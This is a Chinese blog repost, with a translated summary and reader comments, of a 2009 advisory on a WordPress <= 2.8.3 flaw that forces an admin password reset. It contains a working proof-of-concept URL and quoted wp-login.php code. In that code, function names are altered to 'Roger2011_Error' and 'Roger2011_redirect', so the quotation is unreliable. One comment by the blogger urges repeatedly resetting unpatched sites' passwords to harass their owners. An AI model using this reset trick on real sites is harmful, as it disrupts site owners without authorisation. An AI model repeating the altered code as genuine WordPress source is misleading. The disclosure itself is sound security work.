首页 > 网络安全 > WordPress2.8.3远程管理员密码重置漏洞

WordPress2.8.3远程管理员密码重置漏洞

      WordPress 2.8.3存在利用wp-login.php恶意重置管理员密码的漏洞,不过遗憾的是密码被重置后我们并不能直接拿到,而是直接将新密码发送至管理员邮箱。如果能搞定管理员邮箱,那么。。
      据悉,WP已经放出了相关补丁,请用WP的童鞋及时升级覆盖该漏洞文件。
      漏洞发布日期:2009.8.10
      存在漏洞WordPress版本:WordPress 2.8.3及更低
      攻击办法:
      访问http://www.xxx.com/wp-login.php?action=lostpassword,WordPress会向管理员邮箱发送一封邮件,大意为有人要求重置管理员密码,并在邮件中给出一个链接,点击链接后确认重置密码,并将收到另一封包含重置密码的邮件。
      更狠的招:访问http://www.xxx.com/wp-login.php?action=rp&key[]=,WordPress将强制重置密码而无需管理员确认。当然重置后的密码仍然是被发送到管理员邮箱的。

      想了解细节的往下看。

=============================================
– Release date: August 10th, 2009
– Discovered by: Laurent Gaffié
– Severity: Medium
=============================================

I. VULNERABILITY
————————-
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
————————-
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
————————-
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
WordPress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new Roger2011_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("Select * FROM $wpdb->users Where user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new Roger2011_Error('invalid_key', __('Invalid key'));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new Roger2011_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
…[snip]….

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_Roger2011_error($errors) ) {
        Roger2011_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    Roger2011_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.

IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
————————-
All

VII. SOLUTION
————————-
No patch aviable for the moment.

VIII. REFERENCES
————————-
http://www.wordpress.org

IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
————————-
August 10th, 2009: Initial release

XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/115

  1. 0point
    0point 8月 15th, 2009 @ 08:58 | #-31

    @海天无影
    俺也没怎么关注,俺们都是共和国的良民分子。

  2. 海天无影
    海天无影 8月 15th, 2009 @ 08:57 | #-32

    呵呵 看到 但没怎么关注~

  3. 0point
    0point 8月 14th, 2009 @ 08:45 | #-33

    @虾
    虾,你太抬举我了。这个漏洞可不是我发现的哦,只是在国外的一个漏洞网站上转载过来并且将主要意思在开头翻了一下而已。
    @真好网
    目前这个漏洞的补丁和更新已经出来了,有用WP的赶紧去下载吧。
    @Tony
    我也在开始捣鼓WP了,昨天下了个WP2.8.4,但卡在phpMyAdmin在IIS下的调试上了。PJ的功能还是不如WP强大啊。

  4. TONY
    TONY 8月 14th, 2009 @ 01:46 | #-34

    暂时还是不换的,弄着玩的!先熟悉一下嘛!我觉得这个pj早晚要换的!

  5. 真好网
    真好网 8月 13th, 2009 @ 23:16 | #-35

    漏洞有时候是不可避免的,希望尽快修复就好。

  6. 虾
    8月 13th, 2009 @ 18:01 | #-36

    上面的文字认认真真的看完了。还好自己是2.7的。不过一到下面的程序,就晕了,晕得不知道该说什么了。你好高深,知识很细很专业。

  7. 0point
    0point 8月 13th, 2009 @ 13:38 | #-37

    @卢松松
    我用的不是WP,是asp平台下的PJ,呵呵。
    @阿士
    最近正在研究WP,条件成熟的时候可能会考虑更换平台。

  8. 阿士
    阿士 8月 13th, 2009 @ 12:06 | #-38

    玩WP太累人了,E文要查好多资料,所以就放弃了。

  9. 卢松松
    卢松松 8月 13th, 2009 @ 11:08 | #-39

    2.8.4今天出来了,还不快去更新

  10. 0point
    0point 8月 13th, 2009 @ 09:47 | #-40

    @世纪之光
    不是我够先进,而是研究WP漏洞的人够多,哈哈。

  11. 世纪之光
    世纪之光 8月 13th, 2009 @ 09:36 | #-41

    你可真是先进的,这么新的版本,漏洞这么快就出来了。

  12. 0point
    0point 8月 13th, 2009 @ 08:46 | #-42

    @笔头
    但是可以折腾人啊,只要他不打补丁,就一直整他,密码不停的重置,知道对方崩溃,哈哈。
    @tony
    你要换程序了?

  13. tony
    tony 8月 12th, 2009 @ 19:53 | #-43

    正在做一个wp的博客

  14. 笔头
    笔头 8月 12th, 2009 @ 18:10 | #-44

    还是看不到密码~

评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks